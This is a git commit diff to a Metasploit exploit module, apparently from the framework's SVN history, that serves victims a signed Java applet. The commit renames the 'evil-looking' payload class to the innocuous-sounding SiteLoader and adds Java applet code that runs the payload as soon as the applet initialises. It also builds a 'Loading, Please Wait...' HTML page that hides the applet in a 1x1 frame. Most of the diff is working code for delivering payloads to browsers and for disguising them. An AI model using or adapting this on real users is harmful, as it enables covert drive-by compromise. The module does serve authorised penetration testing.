move the evil-looking metasploit.PayloadApplet to the more inocuous SiteLoader.class, re-enable rjb compiling for the applet class
git-svn-id: file:///home/svn/framework3/trunk@11249 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
5dd1f52349
commit
05d073c467
|
@ -4,6 +4,9 @@ Created-By: 1.6.0_18 (Sun Microsystems Inc.)
|
|||
Name: metasploit/PayloadApplet.class
|
||||
SHA1-Digest: X/L7jWCXGQGhITfOvpnJg+jgUZM=
|
||||
|
||||
Name: SiteLoader.class
|
||||
SHA1-Digest: /NL9vqsuF9lcRy+blUjLzLc5+ds=
|
||||
|
||||
Name: metasploit/Payload.class
|
||||
SHA1-Digest: KbAIMttBcLp1zCewA2ERYkcnRU8=
|
||||
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -1,11 +1,14 @@
|
|||
Signature-Version: 1.0
|
||||
SHA1-Digest-Manifest-Main-Attributes: s1TdOxe3gzjQrMmw0MCPecT0Dpk=
|
||||
Created-By: 1.6.0_18 (Sun Microsystems Inc.)
|
||||
SHA1-Digest-Manifest: /3/N9PvurH7pif9Ej6Ki35dLu2A=
|
||||
SHA1-Digest-Manifest: dzpmeIPQyYuf152MUqIrDnqVUCc=
|
||||
|
||||
Name: metasploit/PayloadApplet.class
|
||||
SHA1-Digest: y6+heNFX7iv2UtUFv9ziltcUeAs=
|
||||
|
||||
Name: SiteLoader.class
|
||||
SHA1-Digest: 1n6n1EZcQJEmgsVgihkdqUFtyFE=
|
||||
|
||||
Name: metasploit/Payload.class
|
||||
SHA1-Digest: 70nbz45oAy6s9DR1vxQIhIxgzLc=
|
||||
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -43,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' => [ 'natron' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
|
||||
],
|
||||
[
|
||||
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ]
|
||||
],
|
||||
'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
|
||||
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||
'Targets' =>
|
||||
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1
|
||||
))
|
||||
|
@ -87,10 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]),
|
||||
OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]),
|
||||
OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]),
|
||||
#OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]),
|
||||
|
||||
# Not implemented yet.
|
||||
#OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]),
|
||||
# Needs Rex::Zip to be able to crack zip files
|
||||
#OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]),
|
||||
], self.class)
|
||||
# No source right now, so don't give an option to save it
|
||||
|
@ -116,6 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error
|
||||
|
||||
@use_static = true
|
||||
else
|
||||
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
|
||||
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
|
||||
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
|
||||
@compiled_applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
|
||||
end
|
||||
|
||||
super
|
||||
|
@ -147,16 +153,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# jar, build one for this victim.
|
||||
|
||||
jar = payload.encoded_jar
|
||||
applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "metasploit", "PayloadApplet.class")
|
||||
applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
|
||||
|
||||
jar.add_file("metasploit/PayloadApplet.class", applet_data)
|
||||
|
||||
if @use_static
|
||||
# Then build from the statically signed class files. Note that
|
||||
# this uses a pre-compiled version of Payload.class, so any new
|
||||
# updates to that file in the normal javapayload will not be
|
||||
# reflected here!
|
||||
applet_file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", "SiteLoader.class")
|
||||
applet_data = File.open(applet_file, "rb") { |f| f.read(f.stat.size) }
|
||||
jar.add_file("SiteLoader.class", applet_data)
|
||||
|
||||
print_status("Building statically signed jar for #{cli.peerhost}")
|
||||
build_static_sig(jar)
|
||||
data = jar.to_s
|
||||
else
|
||||
# Then build from the class file we compiled in the exploit()
|
||||
# method above.
|
||||
jar.add_file("#{datastore["APPLETNAME"]}.class", @compiled_applet_data)
|
||||
print_status("Signing file for #{cli.peerhost}")
|
||||
# The RJB signing class requires the jar to be an actual file on
|
||||
# the filesystem, write it out.
|
||||
|
@ -176,8 +189,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def generate_html
|
||||
html = %Q|<html><head><title>Loading, Please Wait...</title></head> |
|
||||
html += %Q|<body><center><p>Loading, Please Wait...</p></center> |
|
||||
html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar" |
|
||||
html += %Q| code="metasploit.PayloadApplet" width="1" height="1">\n|
|
||||
html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar"\n|
|
||||
if @use_static
|
||||
html += %Q| code="SiteLoader" width="1" height="1">\n|
|
||||
else
|
||||
html += %Q| code="#{datastore["APPLETNAME"]}" width="1" height="1">\n|
|
||||
end
|
||||
html += %Q|</applet></body></html>|
|
||||
return html
|
||||
end
|
||||
|
@ -185,9 +202,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def build_static_sig(jar)
|
||||
files = [
|
||||
"metasploit/Payload.class",
|
||||
"metasploit/PayloadApplet.class",
|
||||
"SiteLoader.class",
|
||||
"META-INF/MANIFEST.MF",
|
||||
"META-INF/SIGNFILE.DSA",
|
||||
"META-INF/SIGNFILE.RSA",
|
||||
"META-INF/SIGNFILE.SF",
|
||||
]
|
||||
|
||||
|
@ -222,6 +239,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
jar
|
||||
end
|
||||
|
||||
def applet_code
|
||||
applet = %Q|
|
||||
import java.applet.*;
|
||||
import metasploit.*;
|
||||
|
||||
public class #{datastore["APPLETNAME"]} extends Applet {
|
||||
public void init() {
|
||||
try {
|
||||
Payload.main(null);
|
||||
} catch (Exception ex) {
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue